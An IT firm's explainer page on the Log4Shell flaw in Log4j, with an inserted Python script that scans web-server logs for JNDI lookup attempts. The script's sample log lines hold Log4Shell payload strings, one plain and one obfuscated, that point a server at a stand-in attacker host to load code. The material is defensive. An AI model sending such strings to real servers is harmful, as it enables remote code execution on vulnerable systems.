LOG4SHELL Vulnerability

IN BRIEF: WHAT IS IT?

Lots of IT equipment uses software written in a language called Java. It’s particularly common in devices with embedded systems, including those with web-based admin interfaces.

It’s normal for software developers to re-use common code to achieve common tasks. There’s a code library called Log4j which is used by lots of systems for creating log files.

The problem is:

  1. This library has a vulnerability in it, whereby if an attacker does something that they know will be recorded in the log file, they can craft that action in such a way as to run their own commands on your web server; and
  2. The details on how to exploit this were made public before a fix was available (a ‘zero day’ exploit).

The vulnerability is called Log4Shell because the upshot is that the attacker can run code on your vulnerable system as if they had command line (shell) access to it, exploiting the weakness in Log4j.
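A defender-side check that follows from the description above, added here as an example and not part of the original page: a small Python scanner that reads web-server log lines, collapses the nested-lookup tricks used to disguise the lookup string, and flags lines containing a JNDI lookup. The log lines, the attacker.example host and the function names are constructed for this example.

```python
import re

# Constructed sample web-server log lines (not from the original page).
# Lines 2 and 3 carry the kind of lookup string Log4Shell abuses, the third
# one obfuscated with nested lookups; line 4 has a harmless ${...} placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:09:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/x}"
10.0.0.9 - - [10/Dec/2021:09:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:ldap://attacker.example/x}"
10.0.0.7 - - [10/Dec/2021:09:13:00 +0000] "GET /price?total=${amount} HTTP/1.1" 200 80 "-" "curl/7.79"
"""

# Innermost lookups that evaluate to a plain literal:
#   ${lower:X} / ${upper:X}        -> case-changed X
#   ${::-X} / ${env:NAME:-X}       -> default value X (used when NAME is unset)
_LITERAL = re.compile(
    r"\$\{(lower|upper):([^${}]*)\}"
    r"|\$\{(?:[a-z]+:)?[^${}]*:-([^${}]*)\}"
)

def _resolve(m: re.Match) -> str:
    if m.group(1) == "lower":
        return m.group(2).lower()
    if m.group(1) == "upper":
        return m.group(2).upper()
    return m.group(3)

def normalise(s: str) -> str:
    """Repeatedly collapse literal-producing lookups so an obfuscated string reads plainly."""
    prev = None
    while prev != s:
        prev = s
        s = _LITERAL.sub(_resolve, s)
    return s

_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def find_log4shell_attempts(log_text: str) -> list:
    """Return (line_no, normalised_line) for every line containing a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        norm = normalise(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits

if __name__ == "__main__":
    for n, line in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

A hit in an access log only shows that an attempt reached the device; whether it succeeded depends on the Log4j version behind it, so treat hits as a prompt to patch and investigate, not as proof of compromise.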

WHAT CAN WE DO FOR YOU?

For our clients, we can do the following:

  • Find equipment on your network that’s vulnerable to the exploit
  • Patch the vulnerability in systems provided the manufacturer has released a fix
  • Update infrastructure devices (such as wireless access points) which are running vulnerable software or firmware

Equipment that is old and out-of-support will not have updates written for it. It will not be feasible to make these devices secure.

There are certain techniques (e.g. firewall updates) which can be used to limit the usefulness of the vulnerability, but the range of follow-on actions available to the attacker is so great that the only proper mitigation is to patch or shut down the affected devices.

REFERENCES

Log4Shell is tracked in the NVD as CVE-2021-44228 (nist.gov)

Naked Security Blog (Sophos)
